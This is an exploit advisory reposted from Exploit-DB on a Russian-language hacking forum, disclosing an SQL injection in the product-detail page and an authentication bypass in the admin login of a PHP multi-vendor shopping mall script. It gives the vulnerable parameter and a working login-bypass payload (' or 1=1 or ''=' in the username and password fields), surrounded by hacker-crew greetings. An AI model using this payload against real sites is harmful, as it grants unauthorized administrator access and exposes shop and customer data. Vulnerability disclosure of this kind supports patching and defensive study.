Exploit PreProject Multi-Vendor Shopping Malls - SQL Injection / Authentication Bypass

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
14245
Проверка EDB
  1. Пройдено
Автор
**ROAD_KILLER**
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2010-07-06
Код:
---------------------------------------------------------------------------
[+]Title               Multi-Vendor Shopping Malls   SQL Injection Vulnerability
[+]Author          **RoAd_KiLlEr**
[+]Contact        RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on     Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws 
[~] Home: http://inj3ct0r.com    
[~] Vendor: http://www.hostnomi.com/scripts.php
==========ExPl0iT3d by **RoAd_KiLlEr**==========

[+]Description:
A complete application for Multi-Vendor Shopping Malls with online built-in order placement and processing system, Buying and Selling options, Submit your bulk requirements. Unlimited Store owners can add their stores and products to this system to sale and market their products on single platform. Website owner can add unlimited categories and sub-categories to this E-Commerce system. Store owners have private control panel and order management system. Highly advance new design features with easy template customizations. Major payment gateways included with complete control from admin section. Highly secure customer and store own registrations. Search product by your choice and favorite Store. The world best Multi-Vendor E-Commerce online solution.
=========================================

[+] Dork: No Script Kidies Here :)

==========================================


[+].  SQL-i Vulnerability
=+=+=+=+=+=+=+=+=+

[PoC]:  http://127.0.0.1/path/detail.php?prodid=[SQL-Injection] 


 
 [+].  Auth Bypass Vulnerability
=+=+=+=+=+=+=+=+=+=+


Demo:http://127.0.0.1/path/SiteAdmin/loginform.php

Use ' or 1=1 or ''=' in username and password 



===========================================================================================
[!] Albanian Hacking Crew           
===========================================================================================
[!] **RoAd_KiLlEr**   
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers 
===========================================================================================
[!] Spec Th4nks: Inj3ct0r.com & r0073r  | indoushka from Dz-Ghost Team  | MaFFiTeRRoR | Sid3^effects | The_Exploited | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================
 
Источник
www.exploit-db.com

Похожие темы